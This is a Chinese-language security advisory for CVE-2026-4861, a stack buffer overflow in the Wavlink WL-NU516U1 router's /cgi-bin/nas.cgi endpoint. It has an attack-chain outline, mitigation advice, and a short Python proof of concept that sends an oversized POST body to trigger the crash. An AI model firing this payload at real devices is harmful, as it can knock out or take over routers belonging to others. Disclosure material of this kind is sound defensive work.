CVE-2026-4861 CVSS 8.8 高危

CVE-2026-4861 Wavlink路由器栈溢出漏洞

披露日期: 2026-03-26

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-4861

漏洞类型

缓冲区溢出

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Wavlink WL-NU516U1

漏洞概述

Wavlink WL-NU516U1（固件版本260227）的/cgi-bin/nas.cgi文件中ftext函数存在安全漏洞。攻击者可以通过恶意操纵HTTP头中的Content-Length参数，引发基于栈的缓冲区溢出。该漏洞允许远程攻击者发起攻击，且利用代码已公开，可能导致设备被完全控制或服务中断。

技术细节

该漏洞源于Wavlink WL-NU516U1设备在处理/cgi-bin/nas.cgi请求时，ftext函数未对Content-Length参数进行严格的边界检查。当攻击者发送特制的HTTP请求，指定一个超长的Content-Length值时，程序会将数据复制到栈上的固定大小缓冲区中。由于缺乏长度验证，多余的数据会覆盖栈上的返回地址或其他关键数据，导致栈溢出。攻击者可利用此缺陷绕过ASLR等保护机制（如果设备未开启），最终实现远程代码执行（RCE）或导致设备崩溃（DoS）。

攻击链分析

STEP 1

侦察

攻击者扫描网络，识别暴露的Wavlink WL-NU516U1设备及其Web管理接口。

STEP 2

漏洞利用

攻击者向目标设备的/cgi-bin/nas.cgi端口发送特制的HTTP POST请求，包含恶意的Content-Length头部和超长数据包。

STEP 3

溢出触发

服务器端ftext函数处理请求时发生栈溢出，覆盖返回地址，控制程序执行流。

STEP 4

执行与控制

攻击者成功注入并执行恶意代码，获取设备控制权或导致设备拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit_poc(target_ip):
    target_url = f"http://{target_ip}/cgi-bin/nas.cgi"
    # Vulnerability is triggered by manipulating Content-Length
    # sending a large payload to cause stack overflow in ftext function
    
    payload = "A" * 10000  # Junk data to overflow the buffer
    
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "Content-Length": "10000"
    }
    
    try:
        print(f"[+] Sending payload to {target_url}...")
        response = requests.post(target_url, data=payload, headers=headers, timeout=5)
        print(f"[!] Response status: {response.status_code}")
        print("[*] Check if the device has crashed or if the shell is opened.")
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed or device crashed: {e}")

if __name__ == "__main__":
    target = "192.168.1.1" # Replace with actual target IP
    exploit_poc(target)

影响范围

Wavlink WL-NU516U1 260227

防御指南

临时缓解措施

由于厂商目前尚未发布安全补丁，建议用户立即在防火墙层面阻断外部对设备管理端口（通常为80/443）的访问，或通过ACL仅允许受信任的管理终端连接。对于关键环境，建议暂时停用该型号设备或更换为已修复的其他品牌设备以规避风险。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-4861
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-4861
3 Details https://www.cvedetails.com/cve/CVE-2026-4861/
4 VulDB https://vuldb.com/cve/CVE-2026-4861
5 Link https://github.com/Wlz1112/WAVLINK-NU516U1-V260227/blob/main/Content-Length.md
6 Link https://vuldb.com/?ctiid.353192
7 Link https://vuldb.com/?id.353192
8 Link https://vuldb.com/?submit.776217

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表